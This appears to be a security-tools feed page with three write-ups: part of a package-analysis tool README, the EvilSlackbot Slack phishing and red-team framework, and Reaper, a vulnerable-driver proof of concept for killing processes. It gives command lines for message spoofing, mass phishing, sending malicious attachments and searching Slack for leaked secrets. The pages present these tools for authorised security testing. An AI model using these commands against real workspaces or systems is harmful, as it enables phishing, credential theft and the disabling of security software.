python3 main.py --pkg-mgr apt --analysis-mode static --static-type info --volume-path /mnt --save-file output.json
```
  • Static Service Analysis:

  • This command runs the program in static analysis mode, specifically using the Service file analysis method.

  • It analyzes the packages installed on the mounted volume located at /custom_mount.
  • It saves the output in a JSON file named output.json.
  • It does not generate visual plots for CHROOT analysis. bash python3 main.py --pkg-mgr apt --analysis-mode static --static-type service --volume-path /custom_mount --save-file output.json --info-graphic False

  • Chroot analysis with or without Graphic output:

  • This command runs the program in chroot analysis mode.
  • It analyzes the packages installed on the mounted volume located at /mnt.
  • It saves the output in a JSON file named output.json.
  • It generates visual plots for CHROOT analysis.
  • For graphical output keep --info-graphic as True else False bash python3 main.py --pkg-mgr apt --analysis-mode chroot --volume-path /mnt --save-file output.json --info-graphic True/False

RPM - Static Analysis: - Similar to how its done on apt but there is only one type of static scan avaialable for now. bash python3 main.py --pkg-mgr rpm --analysis-mode static --volume-path /mnt --save-file output.json

  • Chroot analysis with or without Graphic output:
  • Exactly how its done on apt. bash python3 main.py --pkg-mgr rpm --analysis-mode chroot --volume-path /mnt --save-file output.json --info-graphic True/False

Supporting Images

Currently the tool works on Debian and Red Hat based images I can guarentee the debian outputs but the Red-Hat onces still needs work to be done its not perfect.

I am working on the pacman side of things I am trying to find a relaiable way of accessing the pacman db for static analysis.

Graphical Output Images (Chroot)

APT Chroot

RPM Chroot

Inner Workings

For the workings and process related documentation please read the wiki page: Link

TODO

  • [x] Support for RPM
  • [x] Support for APT
  • [x] Support for Chroot Analysis
  • [x] Support for Versions
  • [x] Support for Chroot Graphical output
  • [x] Support for organized graphical output
  • [ ] Support for Pacman

Ideas and Discussions

Ideas regarding this topic are welcome in the discussions page.



Yesterday — 2 June 2024Main stream

EvilSlackbot - A Slack Bot Phishing Framework For Red Teaming Exercises

EvilSlackbot

A Slack Attack Framework for conducting Red Team and phishing exercises within Slack workspaces.

Disclaimer

This tool is intended for Security Professionals only. Do not use this tool against any Slack workspace without explicit permission to test. Use at your own risk.


Background

Thousands of organizations utilize Slack to help their employees communicate, collaborate, and interact. Many of these Slack workspaces install apps or bots that can be used to automate different tasks within Slack. These bots are individually provided permissions that dictate what tasks the bot is permitted to request via the Slack API. To authenticate to the Slack API, each bot is assigned an api token that begins with xoxb or xoxp. More often than not, these tokens are leaked somewhere. When these tokens are exfiltrated during a Red Team exercise, it can be a pain to properly utilize them. Now EvilSlackbot is here to automate and streamline that process. You can use EvilSlackbot to send spoofed Slack messages, phishing links, files, and search for secrets leaked in slack.

Phishing Simulations

In addition to red teaming, EvilSlackbot has also been developed with Slack phishing simulations in mind. To use EvilSlackbot to conduct a Slack phishing exercise, simply create a bot within Slack, give your bot the permissions required for your intended test, and provide EvilSlackbot with a list of emails of employees you would like to test with simulated phishes (Links, files, spoofed messages)

Installation

EvilSlackbot requires python3 and Slackclient

pip3 install slackclient

Usage

usage: EvilSlackbot.py [-h] -t TOKEN [-sP] [-m] [-s] [-a] [-f FILE] [-e EMAIL]
[-cH CHANNEL] [-eL EMAIL_LIST] [-c] [-o OUTFILE] [-cL]

options:
-h, --help show this help message and exit

Required:
-t TOKEN, --token TOKEN
Slack Oauth token

Attacks:
-sP, --spoof Spoof a Slack message, customizing your name, icon, etc
(Requires -e,-eL, or -cH)
-m, --message Send a message as the bot associated with your token
(Requires -e,-eL, or -cH)
-s, --search Search slack for secrets with a keyword
-a, --attach Send a message containing a malicious attachment (Requires -f
and -e,-eL, or -cH)

Arguments:
-f FILE, --file FILE Path to file attachment
-e EMAIL, --email EMAIL
Email of target
-cH CHANNEL, --channel CHANNEL
Target Slack Channel (Do not include #)
-eL EMAIL_LIST, --email_list EMAIL_LIST
Path to list of emails separated by newline
-c, --check Lookup and display the permissions and available attacks
associated with your provided token.
-o OUTFILE, --outfile OUTFILE
Outfile to store search results
-cL, --channel_list List all public Slack channels

Token

To use this tool, you must provide a xoxb or xoxp token.

Required:
-t TOKEN, --token TOKEN (Slack xoxb/xoxp token)
python3 EvilSlackbot.py -t <token>

Attacks

Depending on the permissions associated with your token, there are several attacks that EvilSlackbot can conduct. EvilSlackbot will automatically check what permissions your token has and will display them and any attack that you are able to perform with your given token.

Attacks:
-sP, --spoof Spoof a Slack message, customizing your name, icon, etc (Requires -e,-eL, or -cH)

-m, --message Send a message as the bot associated with your token (Requires -e,-eL, or -cH)

-s, --search Search slack for secrets with a keyword

-a, --attach Send a message containing a malicious attachment (Requires -f and -e,-eL, or -cH)

Spoofed messages (-sP)

With the correct token permissions, EvilSlackbot allows you to send phishing messages while impersonating the botname and bot photo. This attack also requires either the email address (-e) of the target, a list of target emails (-eL), or the name of a Slack channel (-cH). EvilSlackbot will use these arguments to lookup the SlackID of the user associated with the provided emails or channel name. To automate your attack, use a list of emails.

python3 EvilSlackbot.py -t <xoxb token> -sP -e <email address>

python3 EvilSlackbot.py -t <xoxb token> -sP -eL <email list>

python3 EvilSlackbot.py -t <xoxb token> -sP -cH <Channel name>

Phishing Messages (-m)

With the correct token permissions, EvilSlackbot allows you to send phishing messages containing phishing links. What makes this attack different from the Spoofed attack is that this method will send the message as the bot associated with your provided token. You will not be able to choose the name or image of the bot sending your phish. This attack also requires either the email address (-e) of the target, a list of target emails (-eL), or the name of a Slack channel (-cH). EvilSlackbot will use these arguments to lookup the SlackID of the user associated with the provided emails or channel name. To automate your attack, use a list of emails.

python3 EvilSlackbot.py -t <xoxb token> -m -e <email address>

python3 EvilSlackbot.py -t <xoxb token> -m -eL <email list>

python3 EvilSlackbot.py -t <xoxb token> -m -cH <Channel name>

Secret Search (-s)

With the correct token permissions, EvilSlackbot allows you to search Slack for secrets via a keyword search. Right now, this attack requires a xoxp token, as xoxb tokens can not be given the proper permissions to keyword search within Slack. Use the -o argument to write the search results to an outfile.

python3 EvilSlackbot.py -t <xoxp token> -s -o <outfile.txt>

Attachments (-a)

With the correct token permissions, EvilSlackbot allows you to send file attachments. The attachment attack requires a path to the file (-f) you wish to send. This attack also requires either the email address (-e) of the target, a list of target emails (-eL), or the name of a Slack channel (-cH). EvilSlackbot will use these arguments to lookup the SlackID of the user associated with the provided emails or channel name. To automate your attack, use a list of emails.

python3 EvilSlackbot.py -t <xoxb token> -a -f <path to file> -e <email address>

python3 EvilSlackbot.py -t <xoxb token> -a -f <path to file> -eL <email list>

python3 EvilSlackbot.py -t <xoxb token> -a -f <path to file> -cH <Channel name>

Arguments

Arguments:
-f FILE, --file FILE Path to file attachment
-e EMAIL, --email EMAIL Email of target
-cH CHANNEL, --channel CHANNEL Target Slack Channel (Do not include #)
-eL EMAIL_LIST, --email_list EMAIL_LIST Path to list of emails separated by newline
-c, --check Lookup and display the permissions and available attacks associated with your provided token.
-o OUTFILE, --outfile OUTFILE Outfile to store search results
-cL, --channel_list List all public Slack channels

Channel Search

With the correct permissions, EvilSlackbot can search for and list all of the public channels within the Slack workspace. This can help with planning where to send channel messages. Use -o to write the list to an outfile.

python3 EvilSlackbot.py -t <xoxb token> -cL


Before yesterdayMain stream

Reaper - Proof Of Concept On BYOVD Attack


Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate, vulnerable driver into a target system, which allows attackers to exploit the driver to perform malicious actions.

Reaper was specifically designed to exploit the vulnerability present in the kprocesshacker.sys driver in version 2.8.0.0, taking advantage of its weaknesses to gain privileged access and control over the target system.

Note: Reaper does not kill the Windows Defender process, as it has a protection, Reaper is a simple proof of concept.


Features

  • Kill process
  • Suspend process

Help

      ____
/ __ \___ ____ _____ ___ _____
/ /_/ / _ \/ __ `/ __ \/ _ \/ ___/
/ _, _/ __/ /_/ / /_/ / __/ /
/_/ |_|\___/\__,_/ .___/\___/_/
/_/

[Coded by MrEmpy]
[v1.0]

Usage: C:\Windows\Temp\Reaper.exe [OPTIONS] [VALUES]
Options:
sp, suspend process
kp, kill process

Values:
PROCESSID process id to suspend/kill

Examples:
Reaper.exe sp 1337
Reaper.exe kp 1337

Demonstration

Install

You can compile it directly from the source code or download it already compiled. You will need Visual Studio 2022 to compile.

Note: The executable and driver must be in the same directory.



❌
❌